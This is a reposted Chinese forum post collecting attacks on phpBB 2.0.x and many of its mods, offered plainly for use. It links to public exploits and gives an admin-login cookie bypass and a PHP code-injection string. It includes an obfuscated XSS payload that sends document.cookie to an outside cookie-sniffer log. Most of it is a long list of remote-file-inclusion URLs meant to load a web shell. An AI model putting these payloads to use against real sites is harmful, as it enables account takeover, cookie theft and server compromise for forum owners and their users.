返回列表 发帖

[转载]PHPBB HACK

[转载]PHPBB HACK
phpBB 2.0.4
Exploit: http://milw0rm.com/id.php?id=47

phpBB 2.0.5
Exploit: http://milw0rm.com/id.php?id=44

phpBB 2.0.6
Exploit: http://milw0rm.com/id.php?id=137

phpBB 2.0.10
Exploit: http://milw0rm.com/id.php?id=647

phpBB <= 2.0.11
cookies:
Quote:a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

phpBB <= 2.0.12
cookies:
Quote:a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

phpBB <= 2.0.13
Exploit: http://milw0rm.com/id.php?id=907

phpBB <= 2.0.15
Exploit: http://milw0rm.com/id.php?id=1080
收集的PHPBB 漏洞 BY 混世魔王
Code:
viewtopic.php?t=1&highlight='.printf(md5(test)).'
phpBB <= 2.0.16
XSS :
" target="_blank">www.ut'
http://antichat.ru/sniff/log.php

phpBB <= 2.0.17

Exploit: http://rst.void.ru/download/r57phpbb2017.txt

phpBB <= 2.0.18
XSS :
Quote:[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;& +#108;
&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#11 4;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;
&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+# 105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91
;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34 ;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+
103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115; &+#46;&+#106;&+#112;&+#103;&+#63;&+#34;
+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

phpBB <= 2.0.19
Exploit:
http://www.milw0rm.com/exploits/1661
http://www.milw0rm.com/exploits/1661

phpBB <= 2.0.20

Exploit: http://www.milw0rm.com/exploits/1780

phpBB <= 2.0.21

Exploit: http://www.milw0rm.com/exploits/2348


[Shell]
MODy

TopList Hack for PHPBB <= 1.3.8
Quote:/toplist.php?f=toplist_top10&phpbb_root_path=shell

Advanced GuestBook
Quote:/admin/addentry.php?phpbb_root_path=shell

Knowledge Base Mod
Quote:/includes/kb_constants.php?module_root_path=shell

phpBB auction mod
Quote:/auction/auction_common.php?phpbb_root_path=shell

phpRaid <= 3.0.b3
Quote:/[phpraidpath]/auth/auth.php?phpbb_root_path=shell

Quote:/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell

Quote:/[phpraidpath]/auth/auth.php?smf_root_path=shell

Quote:/[phpraidpath]/auth/auth_SMF/smf_root_path=shell

PafileDB
Quote:/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell

Foing <= 0.7.0
Quote:/index.php?phpbb_root_path=shell

Quote:/song.php?phpbb_root_path=shell

Quote:/faq.php?phpbb_root_path=shell

Quote:/list.php?phpbb_root_path=shell

Quote:/gen_m3u.php?phpbb_root_path=shell

Quote:/playlist.php?phpbb_root_path=shell

Activity MOD Plus
Quote:/language/lang_english/lang_activity.php?phpbb_root_path=shell

Blend Portal <= 1.2.0
Quote:/blend_data/blend_common.php?phpbb_root_path=shell

Minerva <= 2.0.8a
Quote:/stat_modules/users_age/module.php?phpbb_root_path=shell

Minerva <= v238
Quote:/admin/admin_topic_action_logging.php?setmodules=attach&p hpbb_root_path=shell

FlashBB <= 1.1.5
Quote:/phpbb/getmsg.php?phpbb_root_path=shell

HoRCMS <= 1.3.1
Quote:/includes/functions_cms.php?phpbb_root_path=shell

mail2forum <= 1.2
Quote:/m2f/m2f_forum.php?m2f_root_path=shell

Quote:/m2f/m2f_phpbb204.php?m2f_root_path=shell

Quote:/m2f/m2f_forum.php?m2f_root_path=shell

Quote:/m2f/m2f_mailinglist.php?m2f_root_path=shell

Quote:/m2f/m2f_cron.php?m2f_root_path=shell

WoW Roster
Quote:/[roster_path]/lib/phpbb.php?subdir=shell

Integramod Portal
Quote:/includes/functions_mod_user.php?phpbb_root_path=shell

Quote:/includes/functions.php?phpbb_root_path=shell

Shadow Premod <= 2.7.1
Quote:/includes/functions_portal.php?phpbb_root_path=shell

phpBB XS <= 0.58
Quote:/includes/functions_kb.php?phpbb_root_path=shell

Quote:/includes/bbcb_mg.php?phpbb_root_path=shell

Quote:/includes/functions.php?phpbb_root_path=shell

pnphpbb
Quote:/includes/functions_admin.php?phpbb_root_path=shell

Admin Topic Action Logging
Quote:/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=

phpBB Static Topics <= 1.0
Quote:/includes/functions_static_topics.php?phpbb_root_path=shell

Security Suite IP Logger
Quote:/includes/logger_engine.php?phpbb_root_path=shell

Dimension of phpBB
Quote:/includes/themen_portal_mitte.php?phpbb_root_path=shell

Quote:/includes/logger_engine.php?phpbb_root_path=shell

Quote:/includes/functions.php?phpbb_root_path=shell

phpBB User Viewed Posts Tracker
Quote:/includes/functions_user_viewed_posts.php?phpbb_root_path=sh ell

phpBB RANDOm USER REGISTRATION NUMBER
Quote:/includes/functions_num_image.php?phpbb_root_path=shell

phpBB insert user <= 0.1.2
Quote:/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Import Tools Mod <= 0.1.4
Quote:/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Ajax Shoutbox <= 0.0.5
Quote:/shoutbox.php?phpbb_root_path=shell

SpamBlockerMOD <= 1.0.2
Quote:/root/includes/antispam.php?phpbb_root_path=shell

phpBB PlusXL 2.x <= biuld 272
Quote:/mods/iai/includes/constants.php?phpbb_root_path=shell

AMAZONIA MOD
Quote:/zufallscodepart.php?phpbb_root_path=shell

news defilante horizontale <= 4.1.1
Quote:/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=shell

phpBB lat2cyr <= 1.0.1
Quote:/lat2cyr.php?phpbb_root_path=shell

SpamOborona PHPBB Plugin
Quote:/admin/admin_spam.php?phpbb_root_path=shell

RPG Events 1.0.0
Quote:/functions_rpg_events.php?phpbb_root_path=shell

phpBB archive for search engines
Quote:/includes/archive/archive_topic.php?phpbb_root_path=shell

PhpBB Prillian French
Quote:/language/lang_french/lang_prillian_faq.php?phpbb_root_path=shell

phpBB ACP User Registration Mod 1.00
Quote:/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Security <= 1.0.1
Quote:/phpbb_security.php?phpbb_root_path=shell

phpBBFM version 206-3-3
Quote:/language/lang_english/lang_prillian_faq.php?phpbb_root_path=shell

Fully Modded phpBB 2
Quote:/faq.php?foing_root_path=shell

Quote:/index.php?foing_root_path=shell

Quote:/list.php?foing_root_path=shell

Quote:/login.php?foing_root_path=shell

Quote:/playlist.php?foing_root_path=shell

Quote:/song.php?foing_root_path=shell

Quote:/view_artist.php?foing_root_path=shell

Quote:/view_song.php?foing_root_path=shell

Quote:/login.php?foing_root_path=shell

Quote:/playlist.php?foing_root_path=shell

Quote:/song.php?foing_root_path=shell

Quote:/flash/set_na.php?foing_root_path=shell

Quote:/flash/initialise.php?foing_root_path=shell

Quote:/flash/get_song.php?foing_root_path=shell

Quote:/includes/common.php?foing_root_path=shell

Quote:/admin/nav.php?foing_root_path=shell

Quote:/admin/main.php?foing_root_path=shell

Quote:/admin/list_artists.php?foing_root_path=shell

Quote:/admin/index.php?foing_root_path=shell

Quote:/admin/genres.php?foing_root_path=shell

Quote:/admin/edit_artist.php?foing_root_path=shell

Quote:/admin/edit_album.php?foing_root_path=shell

Quote:/admin/config.php?foing_root_path=shell

Quote:/admin/admin_status.php?foing_root_path=shell

Spider Friendly <= 1.3.10
Quote:/admin/modules_data.php?phpbb_root_path=shell

返回列表